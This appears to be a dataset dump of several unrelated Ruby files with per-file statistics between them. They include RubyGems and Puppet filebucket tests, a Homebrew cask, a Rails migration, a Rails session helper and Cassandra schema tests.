reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
reporter.update 510
reporter.done
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_nil_length
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', nil
reporter.update 1024
reporter.done
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_zero_length
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 0
reporter.update 1024
reporter.done
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_no_tty
@out.tty = false
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_equal "", @out.string
end
end
| 25.690583 | 131 | 0.701519 |
03f5600887dfd599e3424d18c46dae05b7ad726c | 121 | require './app/helpers/deciders'
def check_contests(state)
contesting_heads(state[:you], state[:board][:snakes])
end
| 20.166667 | 56 | 0.743802 |
79adab47a7c3039edd555c5c211381a7737e3637 | 624 | cask 'preform' do
version '3.0.6,1416'
sha256 '4616eac714ded48575d03d1409e142980c7b6635bca6137587ad0e20cf0b36b2'
# s3.amazonaws.com/FormlabsReleases was verified as official when first introduced to the cask
url "https://s3.amazonaws.com/FormlabsReleases/Release/#{version.before_comma}/PreForm_#{version.before_comma}_release_origin_release_#{version.before_comma}_build_#{version.after_comma}.dmg"
appcast 'https://macupdater.net/cgi-bin/check_urls/check_url_redirect.cgi?url=https://formlabs.com/download-preform-mac/'
name 'PreForm'
homepage 'https://formlabs.com/tools/preform/'
app 'PreForm.app'
end
| 48 | 193 | 0.801282 |
03ce22d3d413ad93d3db56d496a80fff1e3e0ea4 | 841 | class BeTaskableMigration < ActiveRecord::Migration
def self.up
create_table :be_taskable_tasks do |t|
t.string :action
t.references :taskable, polymorphic: true
t.string :state
t.string :label
t.datetime :completed_at
t.datetime :expired_at
t.timestamps
end
create_table :be_taskable_task_assignments do |t|
t.integer :task_id
t.references :assignee, polymorphic: true
t.string :label
t.string :url
t.boolean :confirmed
t.boolean :enacted
t.datetime :visible_at
t.datetime :complete_by
t.datetime :completed_at
t.datetime :expired_at
t.timestamps
end
add_index :be_taskable_tasks, [:taskable_id, :taskable_type]
add_index :be_taskable_task_assignments, :task_id
end
def self.down
drop_table :be_taskable_tasks
drop_table :be_taskable_task_assignments
end
end | 24.028571 | 62 | 0.747919 |
4a00bdef1c58e9b747ea621bf63dfcef233d9cc9 | 630 | require 'test_helper'
class CassandraObject::Schema::TasksTest < CassandraObject::TestCase
test "table_names" do
assert_equal ['Issues'], CassandraObject::Schema.table_names
end
test "dump" do
io = StringIO.new
CassandraObject::Schema.dump(io)
io.rewind
assert_match /Issues/, io.read
end
test "load" do
CassandraObject::Schema.expects(:keyspace_execute).with("DO STUFF;")
CassandraObject::Schema.expects(:keyspace_execute).with("AND MORE;")
CassandraObject::Schema.load StringIO.new(
"DO\n" +
" STUFF;\n" +
"\n" +
"AND\n" +
" MORE;\n"
)
end
end
| 21 | 72 | 0.653968 |
ab2b173e76abd9c8efd23a4cb8da4166a3bf4d2d | 135 | #!/usr/bin/env ruby
require 'benchmark'
require './lib/constant'
Benchmark.bmbm do |x|
x.report('constant(1)') { constant(1) }
end
| 15 | 41 | 0.674074 |
3845a147597f36fb79006cceb4b8c944f7db50e3 | 1,506 | module SessionsHelper
# Logs in the given user.
def log_in(user)
session[:user_id] = user.id
end
# Remembers a user in a persistent session.
def remember(user)
user.remember
cookies.permanent.signed[:user_id] = user.id
cookies.permanent[:remember_token] = user.remember_token
end
# Returns true if the given user is the current user.
def current_user?(user)
user == current_user
end
# Returns the current logged-in user (if any).
def current_user
if (user_id = session[:user_id])
@current_user ||= User.find_by(id: user_id)
elsif (user_id = cookies.signed[:user_id])
user = User.find_by(id: user_id)
if user && user.authenticated?(cookies[:remember_token])
log_in user
@current_user = user
end
end
end
# Returns true if the user is logged in, false otherwise.
def logged_in?
!current_user.nil?
end
# Forgets a persistent session.
def forget(user)
user.forget
cookies.delete(:user_id)
cookies.delete(:remember_token)
end
# Logs out the current user.
def log_out
forget(current_user)
session.delete(:user_id)
@current_user = nil
end
# Redirects to stored location (or to the default).
def redirect_back_or(default)
redirect_to(session[:forwarding_url] || default)
session.delete(:forwarding_url)
end
# Stores the URL trying to be accessed.
def store_location
session[:forwarding_url] = request.original_url if request.get?
end
end
| 24.688525 | 67 | 0.688579 |
f86886faa0e08b2e4d15e461a4da8fc0c0d02745 | 5,596 | #!/usr/bin/env rspec
require 'spec_helper'
require 'puppet/application/filebucket'
require 'puppet/file_bucket/dipper'
describe Puppet::Application::Filebucket do
before :each do
@filebucket = Puppet::Application[:filebucket]
end
it "should declare a get command" do
@filebucket.should respond_to(:get)
end
it "should declare a backup command" do
@filebucket.should respond_to(:backup)
end
it "should declare a restore command" do
@filebucket.should respond_to(:restore)
end
[:bucket, :debug, :local, :remote, :verbose].each do |option|
it "should declare handle_#{option} method" do
@filebucket.should respond_to("handle_#{option}".to_sym)
end
it "should store argument value when calling handle_#{option}" do
@filebucket.options.expects(:[]=).with("#{option}".to_sym, 'arg')
@filebucket.send("handle_#{option}".to_sym, 'arg')
end
end
describe "during setup" do
before :each do
Puppet::Log.stubs(:newdestination)
Puppet.stubs(:settraps)
Puppet.stubs(:parse_config)
Puppet::FileBucket::Dipper.stubs(:new)
@filebucket.options.stubs(:[]).with(any_parameters)
end
it "should set console as the log destination" do
Puppet::Log.expects(:newdestination).with(:console)
@filebucket.setup
end
it "should trap INT" do
Signal.expects(:trap).with(:INT)
@filebucket.setup
end
it "should set log level to debug if --debug was passed" do
@filebucket.options.stubs(:[]).with(:debug).returns(true)
@filebucket.setup
Puppet::Log.level.should == :debug
end
it "should set log level to info if --verbose was passed" do
@filebucket.options.stubs(:[]).with(:verbose).returns(true)
@filebucket.setup
Puppet::Log.level.should == :info
end
it "should Parse puppet config" do
Puppet.expects(:parse_config)
@filebucket.setup
end
it "should print puppet config if asked to in Puppet config" do
Puppet.settings.stubs(:print_configs?).returns(true)
Puppet.settings.expects(:print_configs).returns(true)
expect { @filebucket.setup }.to exit_with 0
end
it "should exit after printing puppet config if asked to in Puppet config" do
Puppet.settings.stubs(:print_configs?).returns(true)
expect { @filebucket.setup }.to exit_with 1
end
describe "with local bucket" do
before :each do
@filebucket.options.stubs(:[]).with(:local).returns(true)
end
it "should create a client with the default bucket if none passed" do
Puppet.stubs(:[]).with(:bucketdir).returns("path")
Puppet::FileBucket::Dipper.expects(:new).with { |h| h[:Path] == "path" }
@filebucket.setup
end
it "should create a local Dipper with the given bucket" do
@filebucket.options.stubs(:[]).with(:bucket).returns("path")
Puppet::FileBucket::Dipper.expects(:new).with { |h| h[:Path] == "path" }
@filebucket.setup
end
end
describe "with remote bucket" do
it "should create a remote Client to the configured server" do
Puppet.stubs(:[]).with(:server).returns("puppet.reductivelabs.com")
Puppet::FileBucket::Dipper.expects(:new).with { |h| h[:Server] == "puppet.reductivelabs.com" }
@filebucket.setup
end
end
end
describe "when running" do
before :each do
Puppet::Log.stubs(:newdestination)
Puppet.stubs(:settraps)
Puppet.stubs(:parse_config)
Puppet::FileBucket::Dipper.stubs(:new)
@filebucket.options.stubs(:[]).with(any_parameters)
@client = stub 'client'
Puppet::FileBucket::Dipper.stubs(:new).returns(@client)
@filebucket.setup
end
it "should use the first non-option parameter as the dispatch" do
@filebucket.command_line.stubs(:args).returns(['get'])
@filebucket.expects(:get)
@filebucket.run_command
end
describe "the command get" do
before :each do
@filebucket.stubs(:print)
@filebucket.stubs(:args).returns([])
end
it "should call the client getfile method" do
@client.expects(:getfile)
@filebucket.get
end
it "should call the client getfile method with the given md5" do
md5="DEADBEEF"
@filebucket.stubs(:args).returns([md5])
@client.expects(:getfile).with(md5)
@filebucket.get
end
it "should print the file content" do
@client.stubs(:getfile).returns("content")
@filebucket.expects(:print).returns("content")
@filebucket.get
end
end
describe "the command backup" do
it "should fail if no arguments are specified" do
@filebucket.stubs(:args).returns([])
lambda { @filebucket.backup }.should raise_error
end
it "should call the client backup method for each given parameter" do
@filebucket.stubs(:puts)
FileTest.stubs(:exists?).returns(true)
FileTest.stubs(:readable?).returns(true)
@filebucket.stubs(:args).returns(["file1", "file2"])
@client.expects(:backup).with("file1")
@client.expects(:backup).with("file2")
@filebucket.backup
end
end
describe "the command restore" do
it "should call the client getfile method with the given md5" do
md5="DEADBEEF"
file="testfile"
@filebucket.stubs(:args).returns([file, md5])
@client.expects(:restore).with(file,md5)
@filebucket.restore
end
end
end
end
| 26.027907 | 102 | 0.642959 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.